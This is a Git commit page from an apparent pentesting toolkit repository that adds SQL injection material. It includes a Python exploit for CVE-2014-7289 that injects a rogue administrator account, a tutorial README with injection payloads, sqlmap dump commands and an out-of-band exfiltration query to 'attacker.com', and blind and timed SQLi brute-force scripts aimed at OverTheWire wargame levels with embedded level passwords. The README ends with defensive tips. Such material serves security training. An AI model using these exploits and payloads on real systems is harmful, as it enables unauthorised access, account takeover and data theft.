Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-05-04 15:55:12 -04:00
Code Issues Projects Releases Packages Wiki Activity

docs: Clean up resources for Hackoctoberfest 2019 (#41)

Browse source 
* Clean up resources for Hackoctoberfest 2019

* 👩🏾‍🦱 Add cloud hacking readme
This commit is contained in:
Mia von Steinkirch 2019-10-29 18:41:32 -07:00 committed by GitHub
parent 746d808fc0
commit 9ed0254149
458 changed files with 9658 additions and 57 deletions
Download patch file Download diff file Expand all files Collapse all files

43
Web_Hacking/SQLi/CVE-2014-7289_exploit.py Normal file
View file

@ -0,0 +1,43 @@
#!/usr/bin/env python
# Reference: http://seclists.org/fulldisclosure/2015/Jan/91
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
if __name__ = '__main__'
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status

212
Web_Hacking/SQLi/README.md Normal file
View file

@ -0,0 +1,212 @@
# SQL Injections (SQLi)
![](http://i.imgur.com/AcVJKT2.png)
* SQL works by building query statements, these statements are intended to be readbale and intuitive.
* A SQL query search can be easily manipulated and assume that a SQL query search is a reliable command. This means that SQL searches are capable of passing, unnoticed, by access control mechanisms.
* Using methods of diverting standard authentication and by checking the authorization credentials, you can gain access to important information stored in a database.
* Exploitation:
- Dumping contents from the database.
- Inserting new data.
- Modifying existing data.
- Writing to disk.
## The Simplest Example
A parameter passed for a name of a user:
```
SELECT * FROM users WHERE
name="$name";
```
In this case, the attacker just needs to introduce a true logical expression like ```1=1```:
```
SELECT * FROM users WHERE 1=1;
```
So that the **WHERE** clause is always executed, which means that it will return the values that match to all users.
Nowadays it is estimated that less than 5% of the websites have this vulnerability.
These types of flaws facilitate the occurrence of other attacks, such as XSS or buffer overflows.
## Blind SQL Injection
* INFERENCE: useful technique when data not returned and/or detailed error messages disabled. We can differentiate between two states based on some attribute of the page response.
* It's estimated that over 20% of the websites have this flow.
* In traditional SQLi it is possible to reveal the information by the attacker writing a payload. In the blind SQLi, the attacker needs to ask the server if something is TRUE or FALSE. For example, you can ask for a user. If the user exists, it will load the website, so it's true.
* Timing-based techniques: infer based on delaying database queries (sleep(), waitfor delay, etc).
```
IF SYSTEM_USER="john" WAIFOR DELAY '0:0:15'
```
* Response-based techniques (True or False): infer based on text in response. Examples:
```
SELECT count (*) FROM reviews WHERE author='bob' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='1' (true)
SELECT count (*) FROM reviews WHERE author='bob' and '1'='2' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SYSTEM_USER='john' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='a' (false)
SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)='c' (true)
```
(and continue to iterate until finding the value of SYSTEM_USER).
* Utilize transport outside of HTTP response.
```
SELECT * FROM reviews WHERE review_author=UTL_INADDR.GET_HOST_ADDRESS((select user from dual ||'.attacker.com'));
INSERT into openowset('sqloledb','Network=DBMSSOCN; Address=10.0.0.2,1088;uid=gds574;pwd=XXX','SELECT * from tableresults') Select name,uid,isntuser from master.dbo.sysusers--
```
### Common ways of Exploitation
* Every time you see an URL, the **question mark** followed by some type of letter or word means that a value is being sent from a page to another.
* In the example
```
http://www.website.com/info.php?id=10
```
the page *info.php* is receiving the data and will have some code like:
```
$id=$_post['id'];
```
and an associated SQL query:
```
QueryHere = "select * from information where code='$id'"
```
#### Checking for vulnerability
We can start to verifying whether the target is vulnerable by attaching a simple quote symbol ```'``` in the end of the URL:
```
http://www.website.com/info.php?id=10'
```
If the website returns the following error:
You have an error in your SQL syntax...
It means that this website is vulnerable to SQL.
#### Find the structure of the database
To find the number of columns and tables in a database we can use [Python's SQLmap](http://sqlmap.org/).
This application streamlines the SQL injection process by automating the detection and exploitation of SQL injection flaws of a database. There are several automated mechanisms to find the database name, table names, and number of columns.
* ORDER BY: it tries to order all columns form x to infinity. The iteration stops when the response shows that the input column x does not exist, reveling the value of x.
* UNION: it gathers several data located in different table columns. The automated process tries to gather all information contained in columns/table x,y,z obtained by ORDER BY. The payload is similar to:
```
?id=5'%22union%22all%22select%221,2,3
```
* Normally the databases are defined with names such as: user, admin, member, password, passwd, pwd, user_name. The injector uses a trial and error technique to try to identify the name:
```
?id=5'%22union%22all%22select%221,2,3%22from%22admin
```
So, for example, to find the database name, we run the *sqlmap* script with target *-u* and enumeration options *--dbs* (enumerate DBMS databases):
```
$ ./sqlmap.py -u <WEBSITE> --dbs
(...)
[12:59:20] [INFO] testing if URI parameter '#1*' is dynamic
[12:59:22] [INFO] confirming that URI parameter '#1*' is dynamic
[12:59:23] [WARNING] URI parameter '#1*' does not appear dynamic
[12:59:25] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:59:25] [INFO] testing for SQL injection on URI parameter '#1*'
[12:59:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:59:27] [WARNING] reflective value(s) found and filtering out
[12:59:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:00:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:00:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
(...)
```
#### Gaining access to the Database
* From this we can verify what databases we have available, for example. From this we can find out how many tables exist, and their respective names. The sqlmap command is:
```
./sqlmap -u <WEBSITE> --tables <DATABASE-NAME>
```
* The main objective is to find usernames and passwords in order to gain access/login to the site, for example in a table named *users*. The sqlmap command is
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME>
```
This will return information about the columns in the given table.
* Now we can dump all the data of all columns using the flag ```-C``` for column names:
```
./sqlmap -u <WEBSITE> --columns -D <DATABASE-NAME> -T <TABLE-NAME> -C 'id,name,password,login,email' --dump
```
If the password are clear text (not hashed in md5, etc), we have access to the website.
## Basic SQL Injection Exploit Steps
1. Fingerprint database server.
2. Get an initial working exploit. Examples of payloads:
- '
- '--
- ')--
- '))--
- or '1'='1'
- or '1'='1
- 1--
3. Extract data through UNION statements:
- NULL: use as a column place holder helps with data type conversion errors
- GROUP BY - help determine number of columns
4. Enumerate database schema.
5. Dump application data.
6. Escalate privilege and pwn the OS.
## Some Protection Tips
* Never connect to a database as a super user or as a root.
* Sanitize any user input. PHP has several functions that validate functions such as:
- is_numeric()
- ctype_digit()
- settype()
- addslahes()
- str_replace()
* Add quotes ```"``` to all non-numeric input values that will be passed to the database by using escape chars functions:
- mysql_real_escape_string()
- sqlit_escape_string()
```php
$name = 'John';
$name = mysql_real_escape_string($name);
$SQL = "SELECT * FROM users WHERE username='$name'";
```
* Always perform a parse of data that is received from the user (POST and FORM methods).
- The chars to be checked:```", ', whitespace, ;, =, <, >, !, --, #, //```.
- The reserved words: SELECT, INSERT, UPDATE, DELETE, JOIN, WHERE, LEFT, INNER, NOT, IN, LIKE, TRUNCATE, DROP, CREATE, ALTER, DELIMITER.
* Do not display explicit error messages that show the request or a part of the SQL request. They can help fingerprint the RDBMS(MSSQL, MySQL).
* Erase user accounts that are not used (and default accounts).
* Other tools: blacklists, AMNESIA, Java Static Tainting, Codeigniter.

44
Web_Hacking/SQLi/sqli_16_brute_force_password.py Normal file
View file

@ -0,0 +1,44 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] ), auth=AUTH)
print r.url
if KEYWORD in r.text:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option
SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
KEYWORD = 'exists'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))

45
Web_Hacking/SQLi/sqli_18_timed_SQLi.py Normal file
View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
time = r.elapsed.total_seconds()
print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
#print r.url
if time >= 9:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option 1
SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))

45
Web_Hacking/SQLi/sqli_COOKIE_brute.py Executable file
View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)